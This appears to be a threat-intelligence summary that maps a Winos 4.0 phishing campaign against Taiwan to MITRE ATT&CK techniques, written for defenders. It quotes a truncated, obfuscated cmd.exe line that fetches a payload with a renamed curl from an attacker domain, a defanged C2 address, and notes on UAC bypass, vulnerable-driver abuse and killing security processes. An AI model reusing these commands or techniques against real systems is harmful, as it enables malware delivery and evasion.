Massive Winos 4.0 Campaigns Target Taiwan

MITRE Techniques

• [T1566 ] Phishing – Initial access via tax-themed spearphishing with weaponized attachments and links (‘tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads.’)
• [T1204.002 ] User Execution: Malicious File – Victims are tricked to open a RAR containing a malicious LNK that initiates the infection (‘RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK file.’)
• [T1059.003 ] Command and Scripting Interpreter: Windows Command Shell – LNK invokes cmd.exe with obfuscated arguments to create directories, masquerade binaries, and download payloads (‘By calling cmd.exe, the attacker executes a series of obfuscated commands designed to download the next-stage payload… Arguments:/C md %public%501 & … -o %public%501Se^tup^64.exe …’)
• [T1105 ] Ingress Tool Transfer – Downloading of next-stage binaries and archives from attacker-controlled domains and cloud services (‘download an executable named Setup64.exe from the remote domain bqdrzbyq[.]cn’ and E-Invoice.rar from cloud hosts)
• [T1036 ] Masquerading – System binary masquerading and renaming legitimate utilities to evade filename-based detection (‘copying the legitimate system utility curl.exe to this new directory and renaming it to url.exe to bypass simple filename-based monitoring.’)
• [T1574.002 ] DLL Side-loading – Delivery of a malicious DLL that is loaded by a legitimate executable to execute code (‘delivers an archive containing a DLL that is sideloaded through a legitimate application.’)
• [T1215 ] Kernel Modules and Extensions – Use of a signed kernel-mode driver (wsftprm.sys) via BYOVD to gain kernel privileges (‘core driver involved is wsftprm.sys … perform a Bring Your Own Vulnerable Driver (BYOVD) attack by dynamically obtaining Native APIs … to bypass standard service monitoring.’)
• [T1548 ] Abuse Elevation Control Mechanism – UAC bypass via Debug Object Hijacking to escalate without prompting the user (‘calls BypassUACViaDebugObject, a technique that combines RPC AppInfo service calls with Debug Object Hijacking … computerdefaults.exe can elevate its thread to administrator level without triggering a UAC prompt.’)
• [T1562.001 ] Impair Defenses: Disable or Modify Tools – Malware enumerates and terminates a hardcoded list of security processes to create a clean environment (‘monitoring loop to cross-reference active processes against a hardcoded list of security products… Terminating these processes achieves a clean environment for Winos 4.0 to persist’).
• [T1071.001 ] Application Layer Protocol: Web Protocols – C2 communications and module retrieval over web protocols, with C2 hidden via Base64 (‘Winos 4.0 hides its C2 address, 47[.]76[.]86[.]151, using Base64 encoding … After verifying the system version, it connects to its C2 to load the core component’).
• [T1027 ] Obfuscated Files or Information – Use of obfuscated command strings and multiple Base64-encoded data fields to conceal driver and plugin loading (‘Its data fields contain numerous Base64-encoded strings used to load drivers and target security software’ and use of obfuscated command fragments like c^u^rl.e^x^e).
• [T1057 ] Process Discovery – Active process monitoring to identify and react to security products (‘enters a monitoring loop to cross-reference active processes against a hardcoded list of security products.’)